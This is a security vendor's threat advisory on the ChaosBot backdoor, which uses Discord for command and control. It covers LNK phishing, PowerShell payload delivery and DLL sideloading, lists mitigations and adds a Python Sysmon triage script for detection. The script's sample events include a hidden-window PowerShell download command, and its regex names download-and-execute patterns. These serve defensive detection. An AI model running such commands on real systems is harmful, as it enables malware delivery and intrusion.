Cybersecurity Threat Advisory: ChaosBot malware exploits Discord

Cybersecurity Threat Advisory

A recently discovered Rust-based backdoor called ChaosBot is being used to compromise Windows hosts and is controlled through Discord. Review the details in this Cybersecurity Threat Advisory to learn more and see how to protect your systems.

What is the threat?

ChaosBot is a Rust-based backdoor that uses Discord as its command-and-control (C2) channel, allowing threat actors to issue remote instructions and conduct reconnaissance on compromised Windows hosts. It spreads via phishing emails that deliver malicious LNK (Windows shortcut) files; opening one runs PowerShell, which downloads and launches ChaosBot while a decoy PDF is shown to the user. The payload DLL is sideloaded through the Microsoft Edge binary identity_helper.exe. The attackers leverage compromised VPN and Active Directory (AD) credentials to move laterally and maintain access, using evasion techniques to avoid detection.

Why is this noteworthy?

ChaosBot's use of Discord for C2, with its name drawn from the operators' Discord handles (chaos_00019 and lovebb0024), lets its traffic blend in with legitimate use of a widely permitted service. The campaign combines LNK phishing, PowerShell payloads, decoy PDFs, and DLL sideloading via Edge to enable reconnaissance and rapid footholds. Additionally, a possible secondary backdoor such as a Visual Studio Code Tunnel suggests a multi-layered access strategy.

Some supported commands are:

  • Shell: Executes shell commands via PowerShell
  • SCR: Captures screenshots
  • Download: Transfers a file from the operators to the victim's device
  • Upload: Exfiltrates a file from the victim's device by posting it to the Discord channel

What is the exposure or risk?

The risks center on rapid initial access via LNK phishing, lateral movement through compromised VPNs and over-privileged AD accounts, and persistent, stealthy operations enabled by FRP (fast reverse proxy) tunnelling. The malware's remote-control capabilities (shell, file transfer, screen capture) heighten data exposure and operational disruption, and the Chaos-C++ ransomware variants noted alongside it raise the stakes further. Enterprises, especially financial services, face credential theft, extended persistence, and regulatory/compliance impacts; mitigations include strict credential hygiene, network segmentation, and monitoring for unusual Discord activity and remote-execution abuse.

What are the recommendations?

Barracuda recommends the following mitigating actions to secure your systems from the ChaosBot malware:

  • Strengthen phishing defenses (spam filtering, DMARC, SPF, DKIM) and train users to recognize LNK attachments and decoy PDFs.
  • Block or restrict the execution of Windows shortcuts (LNK) from email and network shares.
  • Deploy and tune Endpoint Detection and Response (EDR) to detect PowerShell abuse, script-based execution, WMI activity, and DLL sideloading.
  • Enforce least privilege for AD accounts; remediate over-privileged roles.
  • Require MFA for VPN access and critical services; rotate credentials regularly.
  • Monitor for credential theft indicators and unusual VPN or AD activity.
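As an added example (not code from the advisory or from Barracuda), the Python triage script below turns the EDR and monitoring recommendations above into concrete detection logic over Sysmon-style events: PowerShell spawned by Explorer with download-style arguments (the LNK phishing stage), identity_helper.exe loading a DLL from outside the Edge install directory (the sideload), and a process other than a browser or the Discord client resolving Discord hostnames (the C2 channel). The sample events, the list of processes allowed to reach Discord, the trusted DLL directories and the PowerShell command-line patterns are assumptions for illustration; field names follow Sysmon's conventions, but no real log parser is involved.

```python
import re

# --- Tunables (assumptions for this example; adjust to your estate) ---------------

# Discord endpoints that only interactive browsers or the Discord client should resolve.
DISCORD_HOSTS = {"discord.com", "discordapp.com", "cdn.discordapp.com", "gateway.discord.gg"}

# Process names allowed to talk to Discord (assumed allow-list).
ALLOWED_DISCORD_IMAGES = {"msedge.exe", "chrome.exe", "firefox.exe", "discord.exe"}

# Directories from which Microsoft Edge's identity_helper.exe legitimately loads DLLs.
TRUSTED_DLL_DIRS = (
    "c:\\program files\\microsoft\\edge\\",
    "c:\\program files (x86)\\microsoft\\edge\\",
    "c:\\windows\\",
)

# Command-line fragments typical of PowerShell launched by a malicious LNK (heuristic).
SUSPICIOUS_PS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|downloadstring|downloadfile|"
    r"invoke-webrequest|\biwr\b|start-bitstransfer|\biex\b|invoke-expression)",
    re.IGNORECASE,
)


def basename(path):
    """Lower-cased file name of a Windows path ('' for missing values)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the names of the detection rules a single Sysmon-style event matches."""
    hits = []
    eid = ev.get("EventID")
    image = basename(ev.get("Image", ""))

    if eid == 1:  # process creation: LNK -> explorer.exe -> powershell.exe <download cmd>
        parent = basename(ev.get("ParentImage", ""))
        if (image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe"
                and SUSPICIOUS_PS.search(ev.get("CommandLine", ""))):
            hits.append("lnk_powershell_download")

    elif eid == 7:  # image loaded: identity_helper.exe pulling a DLL from an untrusted path
        loaded = ev.get("ImageLoaded", "").lower()
        if image == "identity_helper.exe" and not loaded.startswith(TRUSTED_DLL_DIRS):
            hits.append("edge_identity_helper_sideload")

    elif eid == 22:  # DNS query: Discord resolved by something that is not a browser/client
        if ev.get("QueryName", "").lower() in DISCORD_HOSTS and image not in ALLOWED_DISCORD_IMAGES:
            hits.append("discord_c2_from_unexpected_process")

    return hits


def triage(events):
    """Flatten all hits into (EventID, process name, rule) tuples, in event order."""
    return [(ev["EventID"], basename(ev.get("Image", "")), rule)
            for ev in events for rule in classify(ev)]


# Constructed sample events (not real telemetry); paths, file names and the IP are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -nop -c "Invoke-WebRequest http://203.0.113.10/decoy.pdf -OutFile $env:TEMP\decoy.pdf"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},          # benign admin use
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Local\Temp\identity_helper.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\sideloaded.dll"},
    {"EventID": 7, "Image": r"C:\Program Files\Microsoft\Edge\Application\identity_helper.exe",
     "ImageLoaded": r"C:\Program Files\Microsoft\Edge\Application\msedge.dll"},  # normal Edge
    {"EventID": 22, "Image": r"C:\Users\alice\AppData\Local\Temp\identity_helper.exe",
     "QueryName": "discord.com"},
    {"EventID": 22, "Image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "QueryName": "discord.com"},                                             # user browsing
]

if __name__ == "__main__":
    for eid, proc, rule in triage(SAMPLE_EVENTS):
        print(f"EventID {eid:>2}  {proc:<20}  {rule}")
```

Two caveats when adapting this: Sysmon only emits image-load (EventID 7) records for processes your configuration includes, so identity_helper.exe must be in scope for the sideload rule to see anything; and the PowerShell rule is a heuristic that will also fire on some legitimate scripted downloads launched from the desktop, so treat its hits as triage leads rather than verdicts.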

If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.

This post originally appeared on Smarter MSP.
